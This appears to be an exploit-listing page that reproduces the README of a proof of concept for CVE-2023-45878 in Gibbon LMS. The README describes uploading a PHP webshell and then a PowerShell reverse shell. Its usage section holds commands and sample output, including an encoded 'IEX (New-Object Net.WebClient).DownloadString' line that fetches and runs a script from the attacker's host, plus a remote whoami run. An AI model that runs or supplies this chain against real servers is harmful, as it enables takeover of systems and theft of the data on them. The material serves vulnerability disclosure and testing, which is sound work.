Exploit for Out-of-bounds Write in Gibbonedu Gibbon exploit

5 days ago 9


## https://sploitus.com/exploit?id=B9C9A654-821F-5450-BD25-49C6C09C3224 # CVE-2023-45878-POC CVE-2023-45878 poc for gibbon LMS on xampp windows. Upload a webshell called shell.php for command injection. For reverse shell uploads a powershell reverse shell ps1 script called shell.ps1 which is uploaded to the target machine using the shell.php. # Requirments Python3 Requests python3 module netcat ``` pip3 install requests ``` ## Virtual env ```shell mkdir CVE-2023-45878 cd CVE-2023-45878 python3 -m venv CVE source CVE/bin/activate cd .. pip3 install requests ``` # Usage Tested on Gibbon LMS that was running in XAMPP windows no AV enabled. Target can be found using the login page of Gibbon example http://gibbon-example/Gibbon-LMS/ ## Reverse shell ```shell python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT ``` ### Result ```text [+] PHP shell uploaded successfully to http://target/shell.php [+] PowerShell reverse shell script saved to: shell.ps1 [+] The shell is now hosted at shell.ps1 Starting reverse shell listener in background... Starting netcat listener on ip:REV-PORT... [+] HTTP server running in the background on port SRVPORT [+] Executing PHP shell to download and execute shell.ps1 Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29 [+] HTTP server started on TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 - Connection from TARGET-IP PS C:\xampp\htdocs\Gibbon-LMS> ``` ## Single command ```shell python3 reverse.py --single -target_url http://target -command whoami ``` ### Result ```text [+] PHP shell uploaded successfully to http://target/shell.php [+] Executing PHP command Executing: http://target/shell.php?whoami [+] Command executed successfully pres enter vuln\w.webservice ``` # Credits https://herolab.usd.de/security-advisories/usd-2023-0025/
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